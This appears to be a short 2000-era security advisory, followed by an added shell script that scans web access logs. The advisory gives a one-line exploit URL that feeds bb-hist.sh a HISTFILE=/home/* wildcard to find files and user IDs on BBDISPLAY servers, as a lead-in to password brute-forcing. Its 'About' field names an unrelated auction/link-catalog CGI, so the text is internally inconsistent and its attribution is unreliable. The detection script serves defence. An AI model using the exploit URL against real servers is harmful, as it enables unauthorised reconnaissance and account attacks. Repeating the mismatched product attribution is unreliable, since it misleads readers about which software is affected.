Name   : File Discovery Vulnerability (11-20-2000)
About  : The script "HIS Auktion 1.62" is a catalog-of-links CGI
         script. The creator's site: http://www.his-software.de
Problem: Vulnerabilities exist such that someone can identify
         whether sensitive files exist and determine user IDs on
         the BBDISPLAY server(s), then use those to launch a
         password brute-force attack.

Exploit:

 http://www.victim.com/cgi-bin/bb-hist.sh?HISTFILE=/home/*

                                         Loki
                                         Fate Research Labs
                                         loki@f8labs.com
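
Detection: an added example, not part of the original advisory, that scans
web access logs for bb-hist.sh requests whose HISTFILE value is not a plain
file name, such as the request shown under "Exploit". Assumptions: a
common-log-style access log, legitimate HISTFILE values made up only of
letters, digits, ".", ",", "_" and "-", and hypothetical function names; the
sample log lines are constructed.

```shell
#!/bin/sh
# Flag bb-hist.sh requests whose HISTFILE parameter carries a path,
# a wildcard or a percent-escape instead of a plain file name.
# Assumption: legitimate values use only letters, digits, . , _ and -

# Constructed sample access-log lines (documentation addresses and host).
SAMPLE_LOG='192.0.2.10 - - [20/Nov/2000:10:01:02 +0000] "GET /cgi-bin/bb-hist.sh?HISTFILE=www,example,com.conn HTTP/1.0" 200 512
192.0.2.77 - - [20/Nov/2000:10:03:40 +0000] "GET /cgi-bin/bb-hist.sh?HISTFILE=/home/* HTTP/1.0" 200 301
192.0.2.77 - - [20/Nov/2000:10:03:44 +0000] "GET /cgi-bin/bb-hist.sh?HISTFILE=%2Fhome%2F%2A HTTP/1.0" 200 301
192.0.2.10 - - [20/Nov/2000:10:05:00 +0000] "GET /index.html HTTP/1.0" 200 1024'

# Print the raw HISTFILE value found in one log line (nothing if absent).
histfile_value() {
    printf '%s\n' "$1" |
        sed -n 's/.*bb-hist\.sh?[^ "]*HISTFILE=\([^& "]*\).*/\1/p'
}

# Return 0 when the line is a bb-hist.sh request with a suspicious HISTFILE.
is_suspicious() {
    v=$(histfile_value "$1")
    [ -n "$v" ] || return 1                 # not a HISTFILE request at all
    case "$v" in
        *[!A-Za-z0-9.,_-]*) return 0 ;;     # "/", "*", "%xx" escapes, ...
        *..*)               return 0 ;;     # parent-directory reference
    esac
    return 1
}

# Read log lines on stdin and print only the suspicious ones.
scan_log() {
    while IFS= read -r line; do
        if is_suspicious "$line"; then
            printf '%s\n' "$line"
        fi
    done
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | scan_log
```

To check a real log, feed it on stdin: scan_log < access_log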